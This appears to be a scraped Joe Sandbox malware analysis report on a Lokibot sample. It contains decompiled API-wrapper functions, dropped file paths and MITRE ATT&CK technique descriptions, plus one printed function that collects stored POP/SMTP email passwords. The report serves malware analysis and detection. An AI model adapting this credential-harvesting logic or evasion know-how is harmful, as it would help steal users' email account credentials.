Source File: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.633147622.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_cbgsujmwws.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Uniqueness

Uniqueness Score: -1.00%

Function 00403BEF Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403BEF(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
				_t4 = FindClose(_a4); // executed
				return _t4;
			}

0x00403bfc
0x00403c04
0x00403c07

APIs

FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04

Memory Dump Source

Source File: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.633147622.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_cbgsujmwws.jbxd

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4

Uniqueness

Uniqueness Score: -1.00%

Function 00403BB7 Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403BB7(WCHAR* _a4) {
				long _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xc6808176, 0, 0);
				_t4 = GetFileAttributesW(_a4); // executed
				return _t4;
			}

0x00403bc4
0x00403bcc
0x00403bcf

APIs

GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC

Memory Dump Source

Source File: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.633147622.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_cbgsujmwws.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4

Uniqueness

Uniqueness Score: -1.00%

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004049FF(void* _a4) {
				long _t3;
				void* _t4;

				E004031E5(_t4, 9, 0xd980e875, 0, 0);
				_t3 = RegCloseKey(_a4); // executed
				return _t3;
			}

0x00404a0d
0x00404a15
0x00404a18

APIs

RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.633147622.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_cbgsujmwws.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Uniqueness

Uniqueness Score: -1.00%

Function 00403B64 Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403B64(WCHAR* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
				_t3 = PathFileExistsW(_a4); // executed
				return _t3;
			}

0x00403b72
0x00403b7a
0x00403b7d

APIs

PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A

Memory Dump Source

Source File: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.633147622.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_cbgsujmwws.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID:
API String ID: 1174141254-0
Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199

Uniqueness

Uniqueness Score: -1.00%

Function 00404DE5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

closesocket.WS2_32(00404EB0), ref: 00404DEB

Memory Dump Source

Source File: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.633147622.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_cbgsujmwws.jbxd

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8

Uniqueness

Uniqueness Score: -1.00%

Function 00403F9E Relevance: 1.3, APIs: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403F9E(void* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
				return _t3;
			}

0x00403fac
0x00403fba
0x00403fbe

APIs

VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA

Memory Dump Source

Source File: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.633147622.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_cbgsujmwws.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8

Uniqueness

Uniqueness Score: -1.00%

Function 00406472 Relevance: 1.3, APIs: 1, Instructions: 12
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406472(long _a4) {
				void* _t3;
				void* _t4;

				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
				Sleep(_a4); // executed
				return _t3;
			}

0x0040647f
0x00406487
0x0040648a

APIs

Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487

Memory Dump Source

Source File: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.633147622.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_cbgsujmwws.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9

Uniqueness

Uniqueness Score: -1.00%

Function 004058EA Relevance: 1.3, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004058EA(char* _a4, char* _a8) {
				char* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xc5c16604, 0, 0);
				_t4 = StrStrA(_a4, _a8); // executed
				return _t4;
			}

0x004058f8
0x00405903
0x00405906

APIs

StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903

Memory Dump Source

Source File: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.633147622.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_cbgsujmwws.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559

Uniqueness

Uniqueness Score: -1.00%

Function 00405924 Relevance: 1.3, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405924(WCHAR* _a4, WCHAR* _a8) {
				WCHAR* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
				_t4 = StrStrW(_a4, _a8); // executed
				return _t4;
			}

0x00405932
0x0040593d
0x00405940

APIs

StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D

Memory Dump Source

Source File: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.633147622.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_cbgsujmwws.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t40;
				intOrPtr _t45;
				intOrPtr _t47;
				void* _t71;
				void* _t75;
				void* _t77;

				_t72 = _a4;
				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
				_t81 = _t71;
				if(_t71 != 0) {
					_push(__ebx);
					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
					_v8 = _v8 & 0x00000000;
					_v20 = _t40;
					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
					_v12 = _v12 & 0x00000000;
					_v32 = _t45;
					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
					_t77 = _t75 + 0x50;
					_v36 = _t47;
					if(_v8 != 0 || _v12 != 0) {
						E00405872( *0x49f934, _t71, 1, 0);
						E00405872( *0x49f934, _t67, 1, 0);
						_t74 = _v16;
						E00405872( *0x49f934, _v16, 1, 0);
						E00405781( *0x49f934, _v40);
						E00405872( *0x49f934, _v20, 1, 0);
						_push(_v8);
						E00405762(_v16,  *0x49f934, _v24);
						E00405872( *0x49f934, _v28, 1, 0);
						E00405781( *0x49f934, _v44);
						E00405872( *0x49f934, _v32, 1, 0);
						_push(_v12);
						E00405762(_t74,  *0x49f934, _v36);
						_t77 = _t77 + 0x88;
					} else {
						_t74 = _v16;
					}
					E0040471C(_t71);
					E0040471C(_t67);
					E0040471C(_t74);
					E0040471C(_v20);
					E0040471C(_v24);
					E0040471C(_v28);
					E0040471C(_v32);
					E0040471C(_v36);
				}
				return 1;
			}

0x0040d070
0x0040d080
0x0040d084
0x0040d086
0x0040d08c
0x0040d0a0
0x0040d0ae
0x0040d0bd
0x0040d0c0
0x0040d0c5
0x0040d0c9
0x0040d0e3
0x0040d0f2
0x0040d101
0x0040d104
0x0040d109
0x0040d110
0x0040d11e
0x0040d123
0x0040d126
0x0040d12d
0x0040d145
0x0040d154
0x0040d15a
0x0040d166
0x0040d174
0x0040d186
0x0040d18e
0x0040d19a
0x0040d1ac
0x0040d1ba
0x0040d1cc
0x0040d1d1
0x0040d1dd
0x0040d1e2
0x0040d1e7
0x0040d1e7
0x0040d1e7
0x0040d1eb
0x0040d1f1
0x0040d1f7
0x0040d1ff
0x0040d207
0x0040d20f
0x0040d217
0x0040d21f
0x0040d227
0x0040d230

Strings

EmailAddress, xrefs: 0040D074
Technology, xrefs: 0040D08D
SmtpAccount, xrefs: 0040D0FA
PopServer, xrefs: 0040D099
PopPort, xrefs: 0040D0A7
SmtpPort, xrefs: 0040D0EB
PopAccount, xrefs: 0040D0B6
PopPassword, xrefs: 0040D0D0
SmtpServer, xrefs: 0040D0DC
SmtpPassword, xrefs: 0040D117

Memory Dump Source

Source File: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.633147622.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_cbgsujmwws.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Uniqueness

Uniqueness Score: -1.00%

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.633147622.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_cbgsujmwws.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ypdTgfE0o8

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Lokibot

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

C:\Users\user\AppData\Local\Temp\jplmbcuny

C:\Users\user\AppData\Local\Temp\jurqlvqzsu80j5x5

C:\Users\user\AppData\Roaming\C79A3B\B52B3F.exe (copy)

C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\21c8026919fd094ab07ec3c180a9f210_d06ed635-68f6-4e9a-955c-4899f5f57b9a

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
ypdTgfE0o8

Function 004034F7 Relevance: 86.2, APIs: 34, Strings: 15, Instructions: 450
stringfilecomCOMMON

Function 00405C13 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 148
filestringCOMMON

Function 00406BFE Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Function 0040683D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Function 00403F64 Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Function 00403BB6 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 215
stringregistryCOMMON

Function 0040307D Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 181
memoryCOMMON

Function 0040176F Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 145
stringtimeCOMMON

Function 004032B4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 155
COMMON

